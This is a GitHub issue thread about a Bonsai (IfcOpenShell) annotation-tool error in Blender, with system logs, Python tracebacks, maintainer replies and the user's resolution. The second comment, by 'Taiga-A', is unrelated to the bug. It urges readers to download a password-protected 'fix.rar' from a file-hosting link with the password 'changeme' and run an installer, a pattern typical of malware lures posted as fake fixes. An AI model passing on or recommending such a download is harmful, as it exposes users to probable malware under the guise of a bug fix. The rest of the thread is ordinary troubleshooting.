### ISSUE TITLE
Annotation Tool - empty type when switching annotation type causing errors

### ISSUE THREAD

**Issue by aslejo0395** [IfcOpenShell/IfcOpenShell#5235]
```
os: Windows
os_version: 10.0.19045
python_version: 3.11.7
architecture: ('64bit', 'WindowsPE')
machine: AMD64
processor: Intel64 Family 6 Model 94 Stepping 3, GenuineIntel
blender_version: 4.2.1 LTS
bonsai_version: 0.7.11-alpha240814
bonsai_commit_hash: 795ebc0
last_actions: 
# ifcopenshell.api: geometry.unassign_representation
>>> {"product": {"cast_type": "entity_instance", "value": 1027, "Name": "MY STOREY PLAN"}, "representation": {"cast_type": "entity_instance", "value": 1069, "Name": null}}
# ifcopenshell.api: geometry.remove_representation
>>> {"representation": {"cast_type": "entity_instance", "value": 1069, "Name": null}}
# operator: BIM_OT_annotation_hotkey
# operator: BIM_OT_add_annotation
# operator: BIM_OT_annotation_hotkey
# operator: BIM_OT_add_annotation
# operator: BIM_OT_annotation_hotkey
# operator: BIM_OT_add_annotation
# operator: BIM_OT_annotation_hotkey
# operator: BIM_OT_add_annotation
last_error: Traceback (most recent call last):
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\ifc.py", line 386, in execute_ifc_operator
    result = getattr(operator, "_execute")(context)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 276, in _execute
    getattr(self, f"hotkey_{self.hotkey}")()
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 302, in hotkey_S_A
    create_annotation()
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 187, in create_annotation
    bpy.ops.bim.add_annotation(
  File "C:\Program Files\Blender Foundation\Blender 4.2\4.2\scripts\modules\bpy\ops.py", line 109, in __call__
    ret = _op_call(self.idname_py(), kw)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: Error: Python: Traceback (most recent call last):
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\ifc.py", line 386, in execute_ifc_operator
    result = getattr(operator, "_execute")(context)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\operator.py", line 1203, in _execute
    r = core.add_annotation(tool.Ifc, tool.Collector, tool.Drawing, drawing=drawing, object_type=self.object_type)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\core\drawing.py", line 411, in add_annotation
    obj = drawing_tool.create_annotation_object(drawing, object_type)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\tool\drawing.py", line 103, in create_annotation_object
    obj = annotation.Annotator.get_annotation_obj(drawing, object_type, data_type)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\annotation.py", line 141, in get_annotation_obj
    collection.objects.link(obj)
    ^^^^^^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'objects'
Location: C:\Program Files\Blender Foundation\Blender 4.2\4.2\scripts\modules\bpy\ops.py:109


ifc: FloorPlan.ifc
schema: IFC4
preprocessor_version: IfcOpenShell 0.7.11-alpha240814
originating_system: Bonsai 0.7.11-alpha240814-795ebc0
```

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Andrej730** [comment]
@aslejo0395 hi! Can you please try the latest build from the releases?

**Comment by aslejo0395** [comment]
Same results

```
os: Windows
os_version: 10.0.19045
python_version: 3.11.7
architecture: ('64bit', 'WindowsPE')
machine: AMD64
processor: Intel64 Family 6 Model 94 Stepping 3, GenuineIntel
blender_version: 4.2.1 LTS
bonsai_version: 0.7.11-alpha240827
bonsai_commit_hash: 002c50e
last_actions: 
# ifcopenshell.api: document.edit_information
>>> {"information": {"cast_type": "entity_instance", "value": 1278, "Name": "Unnamed"}, "attributes": "{'Identification': 'X', 'Name': 'MY STOREY PLAN', 'Scope': 'DRAWING'}"}
# ifcopenshell.api: document.edit_reference
>>> {"reference": {"cast_type": "entity_instance", "value": 1280, "Name": null}, "attributes": "{'Location': 'drawings/MY STOREY PLAN.svg'}"}
# ifcopenshell.api: document.assign_document
>>> {"products": [{"cast_type": "entity_instance", "value": 1249, "Name": "MY STOREY PLAN"}], "document": {"cast_type": "entity_instance", "value": 1280, "Name": null}}
# ifcopenshell.api: owner.create_owner_history
>>> {}
# operator: BIM_OT_update_representation
# ifcopenshell.api: geometry.add_representation
>>> {"context": {"cast_type": "entity_instance", "value": 15, "Name": null}, "blender_object": "<bpy_struct, Object(\"IfcAnnotation/MY STOREY PLAN\") at 0x0000014CE3081608>", "geometry": "<bpy_struct, Camera(\"15/1259\") at 0x0000014CE3DCDF08>", "coordinate_offset": "None", "total_items": "1", "should_force_faceted_brep": "False", "should_force_triangulation": "False", "should_generate_uvs": "False", "ifc_representation_class": "None", "profile_set_usage": "None", "text_literal": "None"}
# ifcopenshell.api: style.assign_representation_styles
>>> {"shape_representation": {"cast_type": "entity_instance", "value": 1286, "Name": null}, "styles": "[]", "should_use_presentation_style_assignment": "False"}
# ifcopenshell.api: geometry.unassign_representation
>>> {"product": {"cast_type": "entity_instance", "value": 1249, "Name": "MY STOREY PLAN"}, "representation": {"cast_type": "entity_instance", "value": 1259, "Name": null}}
# ifcopenshell.api: geometry.remove_representation
>>> {"representation": {"cast_type": "entity_instance", "value": 1259, "Name": null}}
# operator: BIM_OT_annotation_hotkey
last_error: Traceback (most recent call last):
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\ifc.py", line 408, in execute_ifc_operator
    result = getattr(operator, "_execute")(context)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 278, in _execute
    getattr(self, f"hotkey_{self.hotkey}")()
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 304, in hotkey_S_A
    create_annotation()
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 184, in create_annotation
    create_annotation_occurrence(bpy.context)
  File "C:\Users\Gerardo\AppData\Roaming\Blender Foundation\Blender\4.2\extensions\.local\lib\python3.11\site-packages\bonsai\bim\module\drawing\workspace.py", line 154, in create_annotation_occurrence
    relating_type = tool.Ifc.get().by_id(int(props.relating_type_id))
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 10: ''

ifc: test.ifc
schema: IFC4
preprocessor_version: IfcOpenShell 0.7.11-alpha240827
originating_system: Bonsai 0.7.11-alpha240827-002c50e
```

**Comment by Andrej730** [comment]
@aslejo0395 can you please describe steps to reproduce this?

**Comment by aslejo0395** [comment]
I finally figured out. I didn't notice there were no type for the annotations. Thank you for your help

![Screenshot 2024-08-27 132737](https://github.com/user-attachments/assets/02f31d3c-f747-4381-b639-fd1dae69521e)

**Comment by Andrej730** [comment]
This issue shouldn't occur after the fix, thank you for the bug report.
